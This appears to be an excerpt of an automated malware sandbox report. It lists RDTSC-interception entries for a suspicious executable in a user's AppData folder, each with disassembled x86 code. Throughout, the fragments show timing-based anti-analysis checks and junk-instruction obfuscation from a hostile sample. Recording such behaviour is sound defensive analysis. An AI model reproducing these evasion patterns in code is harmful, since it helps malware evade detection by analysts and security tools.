Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 58D1A1 second address: 58D1AE instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBC9118B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 58D300 second address: 58D306 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 58D306 second address: 58D30C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 58D30C second address: 58D35C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBC912593FCh 0x00000008 jmp 00007FBC91259403h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnp 00007FBC91259422h 0x00000015 pushad 0x00000016 jmp 00007FBC91259408h 0x0000001b js 00007FBC912593F6h 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 pushad 0x00000025 push eax 0x00000026 pop eax 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5915CE second address: 5915D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5920E9 second address: 5920F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5920F5 second address: 5920F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5920F9 second address: 59212C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC91259403h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jmp 00007FBC91259405h 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 59212C second address: 592138 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jnp 00007FBC9118B8A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 592138 second address: 59214A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBC912593FEh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 592567 second address: 59256B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 523A0A second address: 523A0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 523A0E second address: 523A18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 59998F second address: 5999A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FBC912593F6h 0x0000000a pop ecx 0x0000000b jmp 00007FBC912593FEh 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5999A8 second address: 5999B3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jc 00007FBC9118B8A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 59AF3B second address: 59AF59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC91259405h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 59AF59 second address: 59AF6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jng 00007FBC9118B8AAh 0x0000000e push edx 0x0000000f pop edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 59AF6F second address: 59AF75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 59FE49 second address: 59FE51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 59FE51 second address: 59FE56 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 59FF97 second address: 59FF9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A0105 second address: 5A012F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC912593FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBC91259406h 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A0439 second address: 5A043D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A043D second address: 5A0443 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A0443 second address: 5A044F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A0599 second address: 5A059D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A0A64 second address: 5A0A7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBC9118B8B6h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A0A7E second address: 5A0A84 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A0BC7 second address: 5A0BE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 jmp 00007FBC9118B8B5h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A0BE3 second address: 5A0BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007FBC912593F6h 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A2820 second address: 5A282D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 512E2F second address: 512E94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBC91259401h 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007FBC91259409h 0x00000010 popad 0x00000011 jc 00007FBC91259400h 0x00000017 jmp 00007FBC912593FAh 0x0000001c jmp 00007FBC91259409h 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push edi 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 pop edi 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 512E94 second address: 512E9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A832B second address: 5A8331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A7141 second address: 5A7148 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 55AB19 second address: 53ED24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov dword ptr [esp], eax 0x00000008 stc 0x00000009 mov cl, 43h 0x0000000b lea eax, dword ptr [ebp+1247F8ADh] 0x00000011 xor ch, 00000036h 0x00000014 push eax 0x00000015 jg 00007FBC912593FEh 0x0000001b mov dword ptr [esp], eax 0x0000001e push 00000000h 0x00000020 push ecx 0x00000021 call 00007FBC912593F8h 0x00000026 pop ecx 0x00000027 mov dword ptr [esp+04h], ecx 0x0000002b add dword ptr [esp+04h], 0000001Dh 0x00000033 inc ecx 0x00000034 push ecx 0x00000035 ret 0x00000036 pop ecx 0x00000037 ret 0x00000038 xor dword ptr [ebp+122D19A9h], edx 0x0000003e call dword ptr [ebp+1244E287h] 0x00000044 pushad 0x00000045 pushad 0x00000046 push esi 0x00000047 pop esi 0x00000048 pushad 0x00000049 popad 0x0000004a jmp 00007FBC91259408h 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 55B0DC second address: 55B11C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FBC9118B8AFh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007FBC9118B8B4h 0x00000014 mov eax, dword ptr [eax] 0x00000016 pushad 0x00000017 push eax 0x00000018 push eax 0x00000019 pop eax 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FBC9118B8AAh 0x00000022 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 55B11C second address: 55B168 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jp 00007FBC91259408h 0x00000011 pop eax 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007FBC912593F8h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c mov edi, esi 0x0000002e push 190BF85Dh 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 push edi 0x00000037 pop edi 0x00000038 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 55B168 second address: 55B16C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 55B28C second address: 55B2A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC91259407h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 55B2A7 second address: 55B2E8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FBC9118B8B9h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FBC9118B8B0h 0x00000011 xchg eax, esi 0x00000012 or dword ptr [ebp+122D3381h], ebx 0x00000018 nop 0x00000019 push esi 0x0000001a push eax 0x0000001b push edx 0x0000001c jng 00007FBC9118B8A6h 0x00000022 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 55B2E8 second address: 55B30D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a jng 00007FBC912593F6h 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FBC91259402h 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 55B30D second address: 55B311 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 55B40B second address: 55B412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 55BAEB second address: 55BAFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBC9118B8AFh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 55BAFE second address: 55BB02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 55BD12 second address: 55BD3F instructions: 0x00000000 rdtsc 0x00000002 je 00007FBC9118B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+122D1F80h], ebx 0x00000014 mov dword ptr [ebp+122D1D25h], edi 0x0000001a lea eax, dword ptr [ebp+1247F8ADh] 0x00000020 or ecx, dword ptr [ebp+122D3954h] 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push ebx 0x0000002a push edx 0x0000002b pop edx 0x0000002c pop ebx 0x0000002d rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 55BD3F second address: 55BD45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 55BD45 second address: 53F8B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC9118B8B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007FBC9118B8A8h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 mov ecx, dword ptr [ebp+122D2704h] 0x0000002e call dword ptr [ebp+1244B4A1h] 0x00000034 jbe 00007FBC9118B8AAh 0x0000003a push ecx 0x0000003b push eax 0x0000003c pop eax 0x0000003d pop ecx 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007FBC9118B8B3h 0x00000046 jmp 00007FBC9118B8ADh 0x0000004b rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A755C second address: 5A7573 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC91259403h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A76D1 second address: 5A76D7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A76D7 second address: 5A76DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A76DD second address: 5A76E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A7857 second address: 5A7872 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FBC91259403h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A7872 second address: 5A7878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A7878 second address: 5A7888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FBC91259402h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A7888 second address: 5A788E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A788E second address: 5A7892 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A7892 second address: 5A78A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBC9118B8B2h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A78A8 second address: 5A78AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A78AC second address: 5A78B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A7B9C second address: 5A7BA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A7E46 second address: 5A7E54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBC9118B8AAh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5AA605 second address: 5AA60A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5AA60A second address: 5AA612 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5AA612 second address: 5AA616 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5AA1BF second address: 5AA1C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5AA1C5 second address: 5AA1C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5AA303 second address: 5AA329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 jmp 00007FBC9118B8B3h 0x0000000a jnc 00007FBC9118B8A6h 0x00000010 pop esi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5AA329 second address: 5AA32D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5AA32D second address: 5AA333 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5AA333 second address: 5AA339 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5AA339 second address: 5AA33D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B47A4 second address: 5B47B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FBC912593F6h 0x00000009 jo 00007FBC912593F6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B3063 second address: 5B3069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B3069 second address: 5B3078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007FBC912593F6h 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B3078 second address: 5B307C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B3364 second address: 5B3373 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 jng 00007FBC912593F6h 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B34B7 second address: 5B34BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B34BD second address: 5B34D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC912593FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B34D6 second address: 5B34DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B3650 second address: 5B3657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B44A9 second address: 5B44AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B8690 second address: 5B86A7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FBC91259402h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B7933 second address: 5B7939 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B7939 second address: 5B793F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B793F second address: 5B7943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5B7943 second address: 5B7978 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC912593FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBC91259400h 0x00000010 jmp 00007FBC91259402h 0x00000015 rdtsc
